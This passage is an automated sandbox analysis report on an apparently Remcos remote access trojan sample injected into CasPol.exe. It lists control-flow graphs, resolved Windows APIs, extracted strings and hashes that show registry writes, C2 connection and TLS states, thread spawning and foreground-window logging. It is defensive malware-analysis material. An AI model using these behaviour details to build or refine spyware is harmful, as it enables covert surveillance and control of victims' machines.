40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 196 40dbf3 178->196 197 40dbe6-40dbf1 call 436050 178->197 188->163 202 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 196->202 197->202 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->92 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                            APIs
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                            • API String ID: 2830904901-3665108517
                                                                                            • Opcode ID: 24cf9e8ce8958ae9753faff1b3ec50bd6b2032179e84a0222ff1b4ee64c35613
                                                                                            • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                            • Opcode Fuzzy Hash: 24cf9e8ce8958ae9753faff1b3ec50bd6b2032179e84a0222ff1b4ee64c35613
                                                                                            • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 447 413fd4-41401f call 401faa call 41aa73 call 401faa call 401d64 call 401e8f call 43a5e7 460 414021-414028 Sleep 447->460 461 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afc3 call 404262 call 401d64 call 40b125 447->461 460->461 476 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afc3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 461->476 477 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 461->477 530 41419a-4141a1 476->530 531 41418c-414198 476->531 477->476 532 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 530->532 531->532 559 414244-41428a WSAGetLastError call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 532->559 560 41428f-41429d call 4041f1 532->560 582 414b54-414b66 call 4047eb call 4020b4 559->582 565 4142ca-4142d8 call 404915 call 40428c 560->565 566 41429f-4142c5 call 401f66 * 2 call 41a686 560->566 577 4142dd-4142df 565->577 566->582 581 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a686 call 401eea * 4 call 41a96d call 413683 call 4082dc call 440c51 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 577->581 577->582 647 414434-414441 call 40541d 581->647 648 414446-41446d call 401e8f call 412513 581->648 596 414b68-414b88 call 401d64 call 401e8f call 43a5e7 Sleep 582->596 597 414b8e-414b96 call 401d8c 582->597 596->597 597->476 647->648 654 414474-414ac7 call 403b40 call 40cbf1 call 41adee call 41aec8 call 41ad46 call 401d64 GetTickCount call 41ad46 call 41aca0 call 41ad46 * 2 call 41ac52 call 41aec8 * 5 call 40e679 call 41aec8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 648->654 655 41446f-414471 648->655 901 414ac9-414ad0 654->901 902 414adb-414ae2 654->902 655->654 901->902 903 414ad2-414ad4 901->903 904 414ae4-414ae9 call 40a767 902->904 905 414aee-414b20 call 405415 call 401f66 * 2 call 41a686 902->905 903->902 904->905 916 414b22-414b2e CreateThread 905->916 917 414b34-414b4f call 401eea * 2 call 401e13 905->917 916->917 917->582
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                            • WSAGetLastError.WS2_32 ref: 00414249
                                                                                            • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                            • API String ID: 524882891-2450167416
                                                                                            • Opcode ID: 9df76960a237c1d0a2fbbcb1416c35205674cb26b8568ea1f5a28dbdddc00653
                                                                                            • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                            • Opcode Fuzzy Hash: 9df76960a237c1d0a2fbbcb1416c35205674cb26b8568ea1f5a28dbdddc00653
                                                                                            • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00409E62
                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNELBASE(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                            • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00409E9E
                                                                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 00409EAF
                                                                                            • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 00409EC6
                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                            • API String ID: 3795512280-3163867910
                                                                                            • Opcode ID: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                            • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                            • Opcode Fuzzy Hash: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                            • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1022 40428c-4042ad connect 1023 4043e1-4043e5 1022->1023 1024 4042b3-4042b6 1022->1024 1027 4043e7-4043f5 WSAGetLastError 1023->1027 1028 40445f 1023->1028 1025 4043da-4043dc 1024->1025 1026 4042bc-4042bf 1024->1026 1029 404461-404465 1025->1029 1030 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1026->1030 1031 4042eb-4042f5 call 420151 1026->1031 1027->1028 1032 4043f7-4043fa 1027->1032 1028->1029 1030->1031 1041 404306-404313 call 420373 1031->1041 1042 4042f7-404301 1031->1042 1035 404439-40443e 1032->1035 1036 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1032->1036 1038 404443-40445c call 401f66 * 2 call 41a686 1035->1038 1036->1028 1038->1028 1056 404315-404338 call 401f66 * 2 call 41a686 1041->1056 1057 40434c-404357 call 420f34 1041->1057 1042->1038 1085 40433b-404347 call 420191 1056->1085 1068 404389-404396 call 4202ea 1057->1068 1069 404359-404387 call 401f66 * 2 call 41a686 call 420592 1057->1069 1079 404398-4043bb call 401f66 * 2 call 41a686 1068->1079 1080 4043be-4043d7 CreateEventW * 2 1068->1080 1069->1085 1079->1080 1080->1025 1085->1028
                                                                                            APIs
                                                                                            • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                            • API String ID: 994465650-2151626615
                                                                                            • Opcode ID: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                            • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                            • Opcode Fuzzy Hash: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                            • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                            • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                            • String ID:
                                                                                            • API String ID: 3658366068-0
                                                                                            • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                            • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                            • Sleep.KERNELBASE(000001F4), ref: 0040A461
                                                                                            • GetForegroundWindow.USER32 ref: 0040A467
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                            • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                            • String ID: [${ User has been idle for $ minutes }$]
                                                                                            • API String ID: 911427763-3954389425
                                                                                            • Opcode ID: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                            • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                            • Opcode Fuzzy Hash: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                            • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1194 40c89e-40c8c3 call 401e52 1197 40c8c9 1194->1197 1198 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1194->1198 1199 40c8d0-40c8d5 1197->1199 1200 40c9c2-40c9c7 1197->1200 1201 40c905-40c90a 1197->1201 1202 40c9d8 1197->1202 1203 40c9c9-40c9ce call 43ac0f 1197->1203 1204 40c8da-40c8e8 call 41a74b call 401e18 1197->1204 1205 40c8fb-40c900 1197->1205 1206 40c9bb-40c9c0 1197->1206 1207 40c90f-40c916 call 41b15b 1197->1207 1224 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1198->1224 1210 40c9dd-40c9e2 call 43ac0f 1199->1210 1200->1210 1201->1210 1202->1210 1215 40c9d3-40c9d6 1203->1215 1228 40c8ed 1204->1228 1205->1210 1206->1210 1219 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1207->1219 1220 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1207->1220 1221 40c9e3-40c9e8 call 4082d7 1210->1221 1215->1202 1215->1221 1233 40c8f1-40c8f6 call 401e13 1219->1233 1220->1228 1221->1198 1228->1233 1233->1198
                                                                                            APIs
                                                                                            • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LongNamePath
                                                                                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                            • API String ID: 82841172-425784914
                                                                                            • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                            • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                            • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                            • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                            • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCurrentOpenProcessQueryValue
                                                                                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                            • API String ID: 1866151309-2070987746
                                                                                            • Opcode ID: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                                            • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                            • Opcode Fuzzy Hash: fe419c2785459906763a74068e8ef53e6a02a80517b05617e32006b50ad171bb
                                                                                            • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1365 409d97-409da7 1366 409e44-409e47 1365->1366 1367 409dad-409daf 1365->1367 1368 409db2-409dd8 call 401e07 CreateFileW 1367->1368 1371 409e18 1368->1371 1372 409dda-409de8 GetFileSize 1368->1372 1373 409e1b-409e1f 1371->1373 1374 409dea 1372->1374 1375 409e0f-409e16 CloseHandle 1372->1375 1373->1368 1376 409e21-409e24 1373->1376 1377 409df4-409dfb 1374->1377 1378 409dec-409df2 1374->1378 1375->1373 1376->1366 1379 409e26-409e2d 1376->1379 1380 409e04-409e09 Sleep 1377->1380 1381 409dfd-409dff call 40a7f0 1377->1381 1378->1375 1378->1377 1379->1366 1382 409e2f-409e3f call 4082dc call 4098a5 1379->1382 1380->1375 1381->1380 1382->1366
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                            • String ID: `AG
                                                                                            • API String ID: 1958988193-3058481221
                                                                                            • Opcode ID: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                            • Opcode Fuzzy Hash: 0586b8f9d43dbb7048378459902209a7f5a0eee35e296c9d9bb098e6f758afb4
                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1387 4126d2-4126e9 RegCreateKeyA 1388 412722 1387->1388 1389 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1387->1389 1391 412724-412730 call 401eea 1388->1391 1389->1391
                                                                                            APIs
                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                            • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
